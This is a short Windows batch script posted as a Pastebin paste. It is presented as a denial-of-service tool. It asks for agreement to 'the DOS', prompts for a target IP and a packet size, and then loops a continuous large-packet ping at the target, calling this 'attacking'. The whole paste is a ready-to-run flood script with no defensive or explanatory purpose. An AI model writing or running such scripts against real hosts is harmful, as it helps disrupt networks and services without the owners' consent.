Guest User

Untitled

a guest
May 5th, 2017
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.64 KB | None | 0 0
  1. @echo off
  2. echo do you agree to the DOS?
  3. set /p x=Y or N:
  4. if %x%==y goto agreed
  5. if %x%==Y goto agreed
  6. rem if agreed, continues. else, goes to main menu
  7. goto main
  8. :agreed
  9. cls
  10. set /p b=ip:
  11. set /p c=bytes:
  12. rem assigning amount of bytes/packet to ping with, and the target IP
  13. cls
  14. rem confrmation
  15. echo pinging %b% with %c% bytes per ping
  16. echo is this correct?
  17. set /p correct=Y/N:
  18. rem if correct, continues. otherwise, goes back to input menu.
  19. if %correct%==Y goto PWN
  20. if %correct%==y goto PWN
  21. goto agreed
  22. :pwn
  23. cls
  24. echo press ctrl^c or close program to stop attacking
  25. rem pings the target using inputted data
  26. ping -t -l %c% %b%
  27. goto pwn
Advertisement
Add Comment
Please, Sign In to add comment